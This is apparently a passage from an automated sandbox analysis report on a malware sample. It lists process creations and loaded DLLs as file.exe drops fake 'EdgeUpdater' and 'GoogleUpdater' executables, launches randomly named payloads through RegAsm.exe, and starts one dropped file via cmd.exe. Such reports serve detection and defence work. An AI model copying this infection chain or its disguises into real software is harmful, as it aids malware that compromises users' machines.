                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\JJJEGCGDGH.exe "C:\ProgramData\JJJEGCGDGH.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\EBAEBFIIEC.exe "C:\ProgramData\EBAEBFIIEC.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Desktop\file.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exe" --checkerJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeProcess created: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe "C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exe" Jump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exe C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exe C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeJump to behavior
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\user\Documents\iofolko5\E4aR4O9hOTF5WJfvKNpcVCp8.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userCGHCGIIDGD.exe "C:\Users\userCGHCGIIDGD.exe"
                            Source: C:\Users\userCGHCGIIDGD.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\userJEHDHIEGII.exe "C:\Users\userJEHDHIEGII.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Users\userJEHDHIEGII.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\FIEHIIIJDA.exe "C:\ProgramData\FIEHIIIJDA.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\JJJEGCGDGH.exe "C:\ProgramData\JJJEGCGDGH.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\ProgramData\EBAEBFIIEC.exe "C:\ProgramData\EBAEBFIIEC.exe"
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: unknown unknown
                            Source: C:\ProgramData\FIEHIIIJDA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\JJJEGCGDGH.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                            Source: C:\ProgramData\EBAEBFIIEC.exeProcess created: unknown unknown
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\Desktop\file.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntmarta.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sxs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: propsys.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: linkinfo.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntshrui.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cscapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: edputil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wintypes.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: appresolver.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: bcp47langs.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: slc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: sppc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dhcpcsvc6.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: dhcpcsvc.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasapi32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasman.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rtutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: secur32.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: scrrun.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: napinsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: pnrpnsp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wshbth.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: nlaapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: winrnr.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\GoogleUpdater.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: mscoree.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: version.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\f98ae5e6665140c7bc7a10ef5c598fcb.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wbemcomn.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: amsi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: userenv.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iertutil.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: urlmon.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: srvcli.dllJump to behavior
                            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: netutils.dllJump to behavior
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: version.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: ucrtbase_clr0400.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: uxtheme.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: wldp.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: amsi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: userenv.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: profapi.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: msasn1.dll
                            Source: C:\Users\user\AppData\Local\Temp\EdgeUpdater\LKMService.exeSection loaded: gpapi.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: mscoree.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: apphelp.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: kernel.appcore.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: version.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: vcruntime140_clr0400.dll
                            Source: C:\Users\user\Documents\iofolko5\ZNiWLZA4sT3dAjz_lF65fVs6.exeSection loaded: ucrtbase_clr0400.dll
